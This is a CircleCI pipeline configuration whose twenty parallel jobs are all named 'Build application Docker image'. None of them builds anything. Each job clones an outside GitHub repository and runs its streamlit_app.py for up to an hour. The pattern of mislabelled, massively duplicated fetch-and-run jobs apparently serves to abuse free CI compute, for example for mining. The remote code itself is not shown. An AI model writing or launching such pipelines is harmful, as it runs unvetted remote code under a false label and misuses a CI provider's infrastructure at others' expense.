version: 2.1

jobs:
  build:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build1:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build2:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build3:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build4:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build5:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build6:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build7:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build8:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  build9:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
 
  test-node:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-1:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-2:
    docker:
      - image: cimg/python:3.8
    
    
    
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-3:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-4:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-5:
    docker:
      - image: cimg/python:3.8
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-6:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-7:
    docker:
      - image: cimg/python:3.8
    
    
    
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-8:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run:
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  test-node-9:
    docker:
      - image: cimg/python:3.8
    
    steps:
      - run: 
         name: Build application Docker image
         no_output_timeout : 1h
         command: |
            git clone https://github.com/torgyv/berhasil.git && cd berhasil
            python streamlit_app.py
  
 
  
  
  
    
workflows:
  build-test:
    jobs:
      - build
      - build1
      - build2
      - build3
      - build4
      - build5
      - build6
      - build7
      - build8
      - build9
      - test-node:
          requires: 
            - build
      - test-node-1:
          requires: 
            - build1
      - test-node-2:
          requires: 
            - build2
      - test-node-3:
          requires: 
            - build3
      - test-node-4:
          requires: 
            - build4
      - test-node-5:
          requires: 
            - build5
      - test-node-6:
          requires: 
            - build6
      - test-node-7:
          requires: 
            - build7
      - test-node-8:
          requires: 
            - build8
      - test-node-9:
          requires: 
            - build9
      
